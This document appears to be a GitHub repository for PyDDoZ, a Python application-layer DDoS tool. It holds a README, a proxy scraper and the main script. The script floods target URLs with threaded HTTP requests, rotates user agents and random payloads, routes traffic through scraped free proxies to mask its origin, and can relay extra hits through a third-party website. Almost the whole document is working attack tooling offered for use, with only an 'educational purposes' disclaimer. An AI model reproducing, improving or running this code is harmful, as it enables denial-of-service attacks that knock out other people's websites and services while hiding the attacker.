├── requirements.txt
├── .travis.yml
├── proxify.py
├── .gitignore
├── README.md
├── pyddoz.py
└── LICENSE
/requirements.txt:
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1 | colorama==0.4.1
2 | requests==2.21.0
3 | urllib3==1.25.2
4 | fake-useragent==0.1.11
5 |
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/.travis.yml:
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1 | # Disable sudo to speed up the build
2 | sudo: false
3 |
4 | # Set the build language to Python
5 | language: python
6 |
7 | # Set the Python version to 3.7
8 | python: 3.7
9 |
10 | # Install the pip dependencies
11 | install: pip install -r requirements.txt
12 |
13 | script: echo "Success!"
14 |
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/proxify.py:
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1 | import requests
2 | import re
3 | import random
4 |
5 | def make_request():
6 | urls = ['https://free-proxy-list.net/', 'https://www.sslproxies.org/', 'https://www.us-proxy.org/']
7 | headers = {
8 | 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
9 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
10 | 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
11 | 'Accept-Encoding': 'none',
12 | 'Accept-Language': 'en-US,en;q=0.8',
13 | 'Connection': 'keep-alive',
14 | 'Content-Encoding': 'gzip',
15 | 'Content-Type': 'text/html; charset=utf-8'
16 | }
17 | response = requests.get(random.choice(urls), headers=headers).text
18 | return re.findall(r"
| ')
24 | port = result[1].strip(' | ')
25 | if result[6].strip('') == 'ye':
26 | typ = 'https'
27 | else:
28 | typ = 'http'
29 | return typ + '://' + ip_address + ':' + port
30 |
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/.gitignore:
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25 | *.egg
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32 | *.spec
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40 | .tox/
41 | .coverage
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/README.md:
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1 | [](https://www.python.org/) [](https://github.com/n1rv4n4/pyddoz/)
2 |
3 | # PyDDoZ [](https://github.com/n1rv4n4/pyddoz/) [](https://travis-ci.org/0x01h/pyddoz) [](https://www.gnu.org/licenses/gpl-3.0.en.html)
4 | PyDDoZ is a powerful, human-friendly DDoS tool using application layer (L7) attack techniques. It has nice logging, proxifying, automated bots requests, randomizing data, multiple HTTP request methods, and many other features! Apply load/stress tests to your web application in various ways easily. Written in Python.
5 |
6 | ## Prerequisites
7 | `$ pip3 install -r requirements.txt`
8 |
9 | ## Installation
10 | ```
11 | $ git clone https://github.com/0x01h/pyddoz.git
12 | $ cd pyddoz
13 | $ python3 pyddoz.py
14 | ```
15 |
16 | ## Usage
17 | PyDDoZ provides an interactive shell for users.
18 |
19 | - URLs have to given with http:// or https://. **Do not give only domain name!**
20 | - You can enter multiple URLs with a blank space. It will request randomly one of them for every request.
21 | Example: https://google.com https://twitter.com https://yahoo.com
22 |
23 | Or give just one URL.
24 |
25 | - Select one of the request method. POST and PUT require data to post!
26 | After selecting POST or PUT, you can randomize the data for every request!
27 |
28 | For instance, `username=admin&query=hello` will be sent as `username=[RANDOMSTR]&query=[RANDOMSTR]`
29 |
30 | **RANDOMSTR** could be any random string that was generated at backstage. You can determine maximum length of the random generated string.
31 |
32 | ### Argument Parsing
33 | If you like to use in argument mode rather than interactive mode, take a look at the parameters.
34 |
35 | `$ python3 pyddoz.py -h`
36 |
37 | ```
38 | usage: pyddoz.py [-h] -u U [-m {g,p,u,h,o,d}] [-d D] [-r {y,n}] [-mr MR]
39 | [-b {y,n}] [-ob {y,n}] [-t T] [-th TH] [-s S] [-re RE]
40 | [-p {y,n}] [-rd {y,n}]
41 |
42 | PyDDoZ Argument Parser v1.0.0
43 |
44 | optional arguments:
45 | -h, --help show this help message and exit
46 | -u U URL
47 | -m {g,p,u,h,o,d} GET, POST, PUT, HEAD, OPTIONS, DELETE? [G/P/U/H/O/D]
48 | -d D Post or Put Data
49 | -r {y,n} Randomize Data
50 | -mr MR Max Random Character
51 | -b {y,n} Activate Bots
52 | -ob {y,n} Only Bots
53 | -t T Timeout
54 | -th TH Threads
55 | -s S Sleep Time Between Threads
56 | -re RE Retries
57 | -p {y,n} Proxy
58 | -rd {y,n} Redirection
59 | ```
60 |
61 | ### Features
62 | - Activation of bots: In addition to standard requests, they will also hit and crawl the target URL. (**This feature is experimental and not powerful for now, feel free to send PR to improve and add new bots.**)
63 | - Timeout: Maximum waiting time request to be responded. (Recommended value is higher than 5.)
64 | - Threads: Number of threads to involve the attack. (Large number of threads could lead connection and system errors!)
65 | - Sleeping time between threads (seconds): 0 to non-wait, or you can give floating number such as 0.25, 0.5, or 0.87 etc.
66 | - Retries after failure: You can force requests to retry again.
67 | - Proxy: After selecting this option, fresh and live proxies will be fetched and used randomly! No need to enter proxies manually.
68 | - Allowing redirections: If target responds with 302 or 301 code, you may allow redirections, but most of the time not required.
69 |
70 | [](https://www.linkedin.com/in/orçunözdemir/)
71 |
72 | **For educational purposes only.**
73 |
74 |
75 |
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/pyddoz.py:
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1 | #!/usr/bin/env python3
2 |
3 | import argparse
4 | import logging
5 | import json
6 | import proxify
7 | import requests
8 | import random
9 | import resource
10 | import sys
11 | import string
12 | import time
13 | import threading
14 | import urllib3
15 | from colorama import Fore, Back
16 | from logging.handlers import RotatingFileHandler
17 | from fake_useragent import UserAgent
18 | from time import sleep
19 |
20 |
21 | def show_banner():
22 | print(Fore.RED + Back.BLACK + r'''
23 | -__ /\\ -_____ -_____ _-___
24 | || \\ ' | -, ' | -, /
25 | /||__|| '\\/\\ /| | |` /| | |` /'\\ /
26 | \||__|| || ;' || |==|| || |==|| || || =/=
27 | || |, ||/ ~|| | |, ~|| | |, || || /
28 | _-||-_/ |/ ~-____, ~-____, \\,/ /-__-
29 | || ( ( (
30 | -_-
31 | ''')
32 |
33 |
34 | def send_request():
35 | try:
36 | global num_success
37 | global num_failed
38 | global payload
39 |
40 | url = random.choice(urls)
41 |
42 | header = {
43 | 'User-Agent': ua.random,
44 | 'Accept': '*/*',
45 | 'Accept-Language': 'en-US,en;q=0.5',
46 | 'Accept-Encoding': 'gzip, deflate, br',
47 | 'Pragma': 'no-cache',
48 | 'Cache-Control': 'no-cache',
49 | 'Referer': url}
50 |
51 | request = requests.Session()
52 | request.verify = False
53 |
54 | proxy = None
55 |
56 | if (use_proxy == 'y'):
57 | proxy = proxify.one()
58 | proxy_protocol = proxy.split(':')[0]
59 | proxy = {proxy_protocol: proxy}
60 | logging.info('Selected proxy: ' + str(proxy))
61 |
62 | if (activate_bots == 'y'):
63 | bot_header = header
64 | bot_header['Content-Type'] = 'application/x-www-form-urlencoded'
65 | payload = 'url=' + url + '&submit=Submit&type=GET&http=1.1&uak=0'
66 |
67 | try:
68 | response = request.post(
69 | bot_url,
70 | timeout=selected_to,
71 | headers=bot_header,
72 | data=payload,
73 | proxies=proxy,
74 | allow_redirects=True)
75 | logging.info('Response code from bot: ' +
76 | str(response.status_code))
77 | global num_bot_requests
78 | num_success += 1 if response.status_code == 200 else 0
79 | num_bot_requests += 1
80 |
81 | except Exception as exception:
82 | num_failed += 1
83 | logging.error('Bot request was failed! - ' + str(exception))
84 |
85 | if (only_bots == 'y'):
86 | return
87 |
88 | if (randomize_data == 'y'):
89 | try:
90 | for data in payload:
91 | payload.update({data: ''.join(random.sample(
92 | (string.ascii_letters + string.digits), random.randint(5, max_random)))})
93 | except:
94 | payload = ''.join(random.sample((string.ascii_letters + string.digits), random.randint(5, max_random)))
95 | logging.info('Randomized data: ' + str(payload))
96 |
97 | adapter = requests.adapters.HTTPAdapter(max_retries=num_retries)
98 | request.mount('http://', adapter)
99 | request.mount('https://', adapter)
100 |
101 | if (selected_method == 'p'):
102 | response = request.post(
103 | url,
104 | timeout=selected_to,
105 | headers=header,
106 | proxies=proxy,
107 | data=payload,
108 | allow_redirects=selected_redir)
109 | elif (selected_method == 'u'):
110 | response = request.put(
111 | url,
112 | timeout=selected_to,
113 | headers=header,
114 | proxies=proxy,
115 | data=payload,
116 | allow_redirects=selected_redir)
117 | elif (selected_method == 'g'):
118 | response = request.get(
119 | url,
120 | timeout=selected_to,
121 | headers=header,
122 | proxies=proxy,
123 | allow_redirects=selected_redir)
124 | elif (selected_method == 'o'):
125 | response = request.options(
126 | url,
127 | timeout=selected_to,
128 | headers=header,
129 | proxies=proxy,
130 | allow_redirects=selected_redir)
131 | elif (selected_method == 'h'):
132 | response = request.head(
133 | url,
134 | timeout=selected_to,
135 | headers=header,
136 | proxies=proxy,
137 | allow_redirects=selected_redir)
138 | elif (selected_method == 'd'):
139 | response = request.delete(
140 | url,
141 | timeout=selected_to,
142 | headers=header,
143 | proxies=proxy,
144 | allow_redirects=selected_redir)
145 | else:
146 | raise ValueError('Invalid method!')
147 | logging.error('Invalid method!')
148 |
149 | logging.info('Response code: ' + str(response.status_code))
150 | num_success += 1
151 |
152 | except Exception as exception:
153 | num_failed += 1
154 | logging.error('Request was failed! - ' + str(exception))
155 |
156 | return
157 |
158 |
159 | def arg_parsing():
160 |
161 | parser = argparse.ArgumentParser(
162 | description='PyDDoZ Argument Parser v1.0.0')
163 | parser.add_argument('-u', help='URL', required=True, type=str)
164 | parser.add_argument(
165 | '-m',
166 | help='GET, POST, PUT, HEAD, OPTIONS, DELETE? [G/P/U/H/O/D]',
167 | default='g',
168 | choices=[
169 | 'g',
170 | 'p',
171 | 'u',
172 | 'h',
173 | 'o',
174 | 'd'])
175 | parser.add_argument('-d', help='Post or Put Data', default='', type=str)
176 | parser.add_argument(
177 | '-r',
178 | help='Randomize Data',
179 | default='n',
180 | choices=[
181 | 'y',
182 | 'n'])
183 | parser.add_argument(
184 | '-mr',
185 | help='Max Random Character',
186 | default='10',
187 | type=int)
188 | parser.add_argument(
189 | '-b',
190 | help='Activate Bots',
191 | default='n',
192 | choices=[
193 | 'y',
194 | 'n'])
195 | parser.add_argument(
196 | '-ob',
197 | help='Only Bots',
198 | default='n',
199 | choices=[
200 | 'y',
201 | 'n'])
202 | parser.add_argument('-t', help='Timeout', default=30, type=int)
203 | parser.add_argument('-th', help='Threads', default=128, type=int)
204 | parser.add_argument(
205 | '-s',
206 | help='Sleep Time Between Threads',
207 | default=0,
208 | type=int)
209 | parser.add_argument('-re', help='Retries', default=3, type=int)
210 | parser.add_argument('-p', help='Proxy', default='n', choices=['y', 'n'])
211 | parser.add_argument(
212 | '-rd',
213 | help='Redirection',
214 | default='n',
215 | choices=[
216 | 'y',
217 | 'n'])
218 | args = parser.parse_args()
219 |
220 | return args
221 |
222 |
223 | if __name__ == '__main__':
224 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
225 | logging.basicConfig(
226 | filename='pyddoz.log',
227 | format='%(asctime)s | %(levelname)s | %(message)s',
228 | datefmt='%m/%d/%Y %I:%M:%S %p',
229 | filemode='w',
230 | level=logging.DEBUG)
231 | log = logging.getLogger()
232 | handler = RotatingFileHandler(
233 | 'pyddoz.log',
234 | maxBytes=10 * 1024 * 1024,
235 | backupCount=3)
236 | log.addHandler(handler)
237 | show_banner()
238 | logging.info('Program started!')
239 | print(Back.RESET + Fore.BLUE + '\nProgram is preparing...', end='')
240 | print('\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b', end='')
241 |
242 | try:
243 | ua = UserAgent()
244 |
245 | except BaseException:
246 | ua = UserAgent(use_cache_server=False)
247 |
248 | num_failed = 0
249 | num_success = 0
250 | num_bot_requests = 0
251 | bot_url = 'https://websniffer.cc/'
252 | urls = []
253 | randomize_data = 'n'
254 | interactive_mode = False
255 |
256 | try:
257 | if (not (len(sys.argv) > 1)):
258 | interactive_mode = True
259 | raise Exception('Interactive Shell Mode')
260 | else:
261 | arguments = arg_parsing()
262 |
263 | if ((arguments is not False) and (arguments.u)):
264 |
265 | urls = [arguments.u]
266 | selected_method = arguments.m
267 | payload = arguments.d
268 | randomize_data = arguments.r
269 | max_random = arguments.mr
270 | activate_bots = arguments.b
271 | only_bots = arguments.ob
272 | selected_to = arguments.t
273 | num_threads = arguments.th
274 | sleep_time = arguments.s
275 | num_retries = arguments.re
276 | use_proxy = arguments.p
277 | selected_redir = arguments.rd
278 |
279 | start_time = time.time()
280 | print(Fore.BLUE + '\rProgram was started successfully!')
281 | print(Fore.RED + 'Attack is started! Press [CTRL + C] to stop.')
282 | logging.info('Attack started!')
283 |
284 | while (True):
285 | try:
286 | for i in range(num_threads):
287 | t = threading.Thread(target=send_request)
288 | t.start()
289 | sleep(sleep_time)
290 | elapsed_time = time.time() - start_time
291 | print(Fore.BLUE + 'Responded Requests: {0} - Nuked Requests: {1} - Bot Requests: {2} - Elapsed Time: {3} seconds.'.format(str(num_success), str(num_failed), str(num_bot_requests), round(elapsed_time)), end='\r', flush=True)
292 |
293 | main_thread = threading.currentThread()
294 | for i in threading.enumerate():
295 | if i is main_thread:
296 | continue
297 | else:
298 | print(Fore.BLUE + 'Responded Requests: {0} - Nuked Requests: {1} - Bot Requests: {2} - Elapsed Time: {3} seconds.'.format(str(num_success), str(num_failed), str(num_bot_requests), round(elapsed_time)), end='\r', flush=True)
299 | i.join()
300 |
301 | except KeyboardInterrupt:
302 | print(Fore.RED + '\nAttack was stopped!')
303 | logging.info('Attack stopped!')
304 | main_thread = threading.currentThread()
305 | print(Fore.RED + 'Threads are exiting...')
306 |
307 | for i in threading.enumerate():
308 | if i is main_thread:
309 | continue
310 | else:
311 | i.join()
312 |
313 | logging.info(
314 | 'Responded Requests: {0} - Nuked Requests: {1} - Bot Requests: {2} - Elapsed Time: {3} seconds.'.format(
315 | str(num_success),
316 | str(num_failed),
317 | str(num_bot_requests),
318 | round(elapsed_time)))
319 | print(Fore.BLUE + 'Successfully finished!')
320 | logging.info('Successfully finished!')
321 | sys.exit()
322 |
323 | except BaseException as arg_error:
324 | logging.critical('Argument mode was stopped! ' + str(arg_error))
325 | if (not interactive_mode):
326 | sys.exit()
327 |
328 | print(Fore.BLUE + '\rProgram was started successfully!')
329 |
330 | while (True):
331 | try:
332 | selected_urls = str(input(Fore.GREEN + 'Enter URL(s): '))
333 |
334 | if (not isinstance(selected_urls, str)):
335 | print(Fore.RED + 'Enter valid URL(s)!')
336 | continue
337 |
338 | else:
339 | break
340 |
341 | except KeyboardInterrupt:
342 | logging.critical('Interrupt by keyboard before the attack!')
343 | sys.exit()
344 |
345 | except BaseException:
346 | continue
347 |
348 | for splitted_url in selected_urls.split(' '):
349 | urls.append(splitted_url)
350 | logging.info('URL: ' + splitted_url)
351 |
352 | while (True):
353 | try:
354 | selected_method = str(
355 | input(
356 | Fore.GREEN +
357 | 'Enter request method GET, POST, PUT, HEAD, OPTIONS, DELETE? [G/P/U/H/O/D]: ')[0].lower())
358 |
359 | if (selected_method not in 'gpuhod'):
360 | print(Fore.RED + 'Enter G, P, U, H, O, or D!')
361 | continue
362 |
363 | else:
364 | break
365 |
366 | except KeyboardInterrupt:
367 | logging.critical('Interrupt by keyboard before the attack!')
368 | sys.exit()
369 |
370 | except BaseException:
371 | continue
372 |
373 | logging.info('HTTP request method: ' + selected_method.upper())
374 |
375 | if (selected_method == 'p' or selected_method == 'u'):
376 | payload = {}
377 | key_turn = True
378 | raw_post = str(input(Fore.GREEN + 'Enter post data: '))
379 |
380 | try:
381 | if ('&' in raw_post):
382 | for params in raw_post.split('&'):
383 | for param in params.split('='):
384 | if key_turn:
385 | payload[param] = ''
386 | last_key = param
387 | key_turn = False
388 | else:
389 | payload[last_key] = param
390 | key_turn = True
391 | else:
392 | payload[raw_post.split('=')[0]] = raw_post.split('=')[1]
393 |
394 | logging.info('POST or PUT data: ' + str(payload))
395 |
396 | except BaseException as payload_error:
397 | payload = 'LEL!'
398 | logging.error(payload_error)
399 | logging.error(
400 | 'POST or PUT data could not be understood! Default data configurated as: "' +
401 | payload +
402 | '"')
403 |
404 | while (True):
405 | try:
406 | randomize_data = str(
407 | input(
408 | Fore.GREEN +
409 | 'Do you want to randomize post data? [Y/N]: ')[0].lower())
410 |
411 | if (randomize_data not in 'yn'):
412 | print(Fore.RED + 'Enter Y or N!')
413 | continue
414 |
415 | else:
416 | break
417 |
418 | except KeyboardInterrupt:
419 | logging.critical('Interrupt by keyboard before the attack!')
420 | sys.exit()
421 |
422 | except BaseException:
423 | continue
424 |
425 | logging.info('Randomize data: ' + randomize_data.upper())
426 |
427 | if (randomize_data == 'y'):
428 | while (True):
429 | try:
430 | max_random = int(
431 | input(
432 | Fore.GREEN +
433 | 'Enter maximum length of random alphanumeric strings to create: '))
434 |
435 | if (not isinstance(max_random, int)
436 | or not (5 <= max_random <= 1048576)):
437 | print(
438 | Fore.RED + 'Enter valid number between 5 and 1048576!')
439 | continue
440 |
441 | else:
442 | break
443 |
444 | except KeyboardInterrupt:
445 | logging.critical(
446 | 'Interrupt by keyboard before the attack!')
447 | sys.exit()
448 |
449 | except BaseException:
450 | continue
451 |
452 | logging.info(
453 | 'Maximum length of randomized string: ' +
454 | str(max_random))
455 |
456 | while (True):
457 | try:
458 | activate_bots = str(
459 | input(
460 | Fore.GREEN +
461 | 'Do you want to activate bots? [Y/N]: ')[0].lower())
462 |
463 | if (activate_bots not in 'yn'):
464 | print(Fore.RED + 'Enter Y or N!')
465 | continue
466 |
467 | else:
468 | break
469 |
470 | except KeyboardInterrupt:
471 | logging.critical('Interrupt by keyboard before the attack!')
472 | sys.exit()
473 |
474 | except BaseException:
475 | continue
476 |
477 | logging.info('Activate Bots: ' + activate_bots.upper())
478 |
479 | if (activate_bots == 'y'):
480 | while (True):
481 | try:
482 | only_bots = str(
483 | input(
484 | Fore.RED +
485 | 'Only bots? [Y/N]: ')[0].lower())
486 |
487 | if (only_bots not in 'yn'):
488 | print(Fore.RED + 'Enter Y or N!')
489 | continue
490 |
491 | else:
492 | break
493 |
494 | except KeyboardInterrupt:
495 | logging.critical('Interrupt by keyboard before the attack!')
496 | sys.exit()
497 |
498 | except BaseException:
499 | continue
500 |
501 | if (only_bots == 'y'):
502 | logging.warning('Only bots are included!')
503 | else:
504 | pass
505 |
506 | while (True):
507 | try:
508 | selected_to = float(
509 | input(
510 | Fore.GREEN +
511 | 'Enter timeout second for requests: '))
512 |
513 | if (not isinstance(selected_to, float)
514 | or not (3 <= selected_to <= 30)):
515 | print(Fore.RED + 'Enter valid second(s) between 3 and 30!')
516 | continue
517 |
518 | else:
519 | break
520 |
521 | except KeyboardInterrupt:
522 | logging.critical('Interrupt by keyboard before the attack!')
523 | sys.exit()
524 |
525 | except BaseException:
526 | continue
527 |
528 | logging.info('Timeout: ' + str(selected_to))
529 |
530 | while (True):
531 | try:
532 | num_threads = int(input(Fore.GREEN + 'Enter number of threads: '))
533 |
534 | if (not isinstance(num_threads, int)
535 | or not (1 <= num_threads <= 1024)):
536 | print(
537 | Fore.RED +
538 | 'Enter valid number of threads between 1 and 1024!')
539 | continue
540 |
541 | else:
542 | break
543 |
544 | except KeyboardInterrupt:
545 | logging.critical('Interrupt by keyboard before the attack!')
546 | sys.exit()
547 |
548 | except BaseException:
549 | continue
550 |
551 | logging.info('Number of threads: ' + str(num_threads))
552 |
553 | while (True):
554 | try:
555 | sleep_time = float(
556 | input(
557 | Fore.GREEN +
558 | 'Enter seconds of sleeping between threads: '))
559 |
560 | if (not isinstance(sleep_time, float)
561 | or not (0 <= sleep_time <= 300)):
562 | print(Fore.RED + 'Enter valid seconds between 0 and 300!')
563 | continue
564 |
565 | else:
566 | break
567 |
568 | except KeyboardInterrupt:
569 | logging.critical('Interrupt by keyboard before the attack!')
570 | sys.exit()
571 |
572 | except BaseException:
573 | continue
574 |
575 | logging.info(
576 | 'Sleep time between threads: ' +
577 | str(sleep_time) +
578 | ' seconds.')
579 |
580 | while (True):
581 | try:
582 | num_retries = int(
583 | input(
584 | Fore.GREEN +
585 | 'Enter number of retries after a connection failure: '))
586 |
587 | if (not isinstance(num_retries, int)
588 | or not (0 <= num_retries <= 32)):
589 | print(
590 | Fore.RED +
591 | 'Enter valid number of retries between 0 and 32!')
592 | continue
593 |
594 | else:
595 | break
596 |
597 | except KeyboardInterrupt:
598 | logging.critical('Interrupt by keyboard before the attack!')
599 | sys.exit()
600 |
601 | except BaseException:
602 | continue
603 |
604 | logging.info('Number of retries after failures: ' + str(num_retries))
605 |
606 | while (True):
607 | try:
608 | use_proxy = str(
609 | input(
610 | Fore.GREEN +
611 | 'Do you want to use proxy? [Y/N]: ')[0].lower())
612 |
613 | if (use_proxy not in 'yn'):
614 | print(Fore.RED + 'Enter Y or N!')
615 | continue
616 |
617 | else:
618 | break
619 |
620 | except KeyboardInterrupt:
621 | logging.critical('Interrupt by keyboard before the attack!')
622 | sys.exit()
623 |
624 | except BaseException:
625 | continue
626 |
627 | logging.info('Use Proxy?: ' + use_proxy.upper())
628 |
629 | while (True):
630 | try:
631 | selected_redir = str(
632 | input(
633 | Fore.GREEN +
634 | 'Do you want to allow redirections? [Y/N]: ')[0].lower())
635 |
636 | if (selected_redir not in 'yn'):
637 | print(Fore.RED + 'Enter Y or N!')
638 | continue
639 |
640 | else:
641 | break
642 |
643 | except KeyboardInterrupt:
644 | logging.critical('Interrupt by keyboard before the attack!')
645 | sys.exit()
646 |
647 | except BaseException:
648 | continue
649 |
650 | logging.info('Allow Redirections?: ' + str(selected_redir))
651 |
652 | if (selected_redir == 'y'):
653 | selected_redir = True
654 | else:
655 | selected_redir = False
656 |
657 | start_time = time.time()
658 | print(Fore.RED + 'Attack is started! Press [CTRL + C] to stop.')
659 | logging.info('Attack started!')
660 |
661 | while (True):
662 | try:
663 | for i in range(num_threads):
664 | t = threading.Thread(target=send_request)
665 | t.start()
666 | sleep(sleep_time)
667 | elapsed_time = time.time() - start_time
668 | print(Fore.BLUE + 'Responded Requests: {0} - Nuked Requests: {1} - Bot Requests: {2} - Elapsed Time: {3} seconds.'.format(str(num_success), str(num_failed), str(num_bot_requests), round(elapsed_time)), end='\r', flush=True)
669 |
670 | main_thread = threading.currentThread()
671 | for i in threading.enumerate():
672 | if i is main_thread:
673 | continue
674 | else:
675 | print(Fore.BLUE + 'Responded Requests: {0} - Nuked Requests: {1} - Bot Requests: {2} - Elapsed Time: {3} seconds.'.format(str(num_success), str(num_failed), str(num_bot_requests), round(elapsed_time)), end='\r', flush=True)
676 | i.join()
677 |
678 | except KeyboardInterrupt:
679 | print(Fore.RED + '\nAttack was stopped!')
680 | logging.info('Attack stopped!')
681 | main_thread = threading.currentThread()
682 | print(Fore.RED + 'Threads are exiting...')
683 |
684 | for i in threading.enumerate():
685 | if i is main_thread:
686 | continue
687 | else:
688 | i.join()
689 |
690 | logging.info(
691 | 'Responded Requests: {0} - Nuked Requests: {1} - Bot Requests: {2} - Elapsed Time: {3} seconds.'.format(
692 | str(num_success),
693 | str(num_failed),
694 | str(num_bot_requests),
695 | round(elapsed_time)))
696 | print(Fore.BLUE + 'Successfully finished!')
697 | logging.info('Successfully finished!')
698 | break
699 |
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623 | How to Apply These Terms to Your New Programs
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